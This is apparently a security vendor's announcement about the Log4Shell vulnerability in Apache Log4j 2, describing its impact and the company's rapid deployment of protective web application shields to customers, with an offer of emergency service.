A zero-day exploit of Apache Log4j 2 (“Log4Shell”, CVE-2021-44228) was disclosed on 9 December 2021. CISA, NCSC, ACSC, and CERTNZ have observed active exploitation of this vulnerability.
The high severity vulnerability in Log4j (a logging library present in many Java-based applications) allows for Remote Code Execution (RCE) on a server.
Log4j is present in many frameworks, making the impact widespread – Minecraft: Java Edition, Apple, Amazon, Steam, Twitter, and more are reportedly affected. The number of interdependencies around Log4j makes this vulnerability extremely serious.
A successful exploit leads to a malicious actor gaining complete, unauthenticated access to the target system and control log messages and log message parameters.
As soon as this issue was made public, RedShield engineers worked to develop and test web application shields to mitigate this high severity vulnerability. Shields were produced and tested by 08:22, Friday 10 December (EST).
We subsequently took steps to protect all customers from exploits targeting this vulnerability, and began deploying the new shields across all customer applications. This was completed for all customers by 22:18, Friday 10 December (EST).
Many organizations will use WAF signatures to try and block exploits targeting this vulnerability. However, since the vulnerability was disclosed, we have seen other WAF vendor signatures being bypassed.
RedShield’s defensive strategy has a three prong approach:
If you have other applications using Java, we can build and apply Log4j shields for new customers within 24 hours. New customers can opt to have solely these shields for Log4j and emergency deployment slots will be filled on a “first in first served” basis.
Contact support@redshield.co to discuss emergency deployment. Solutions Architects will be available for consultation around your specific environment.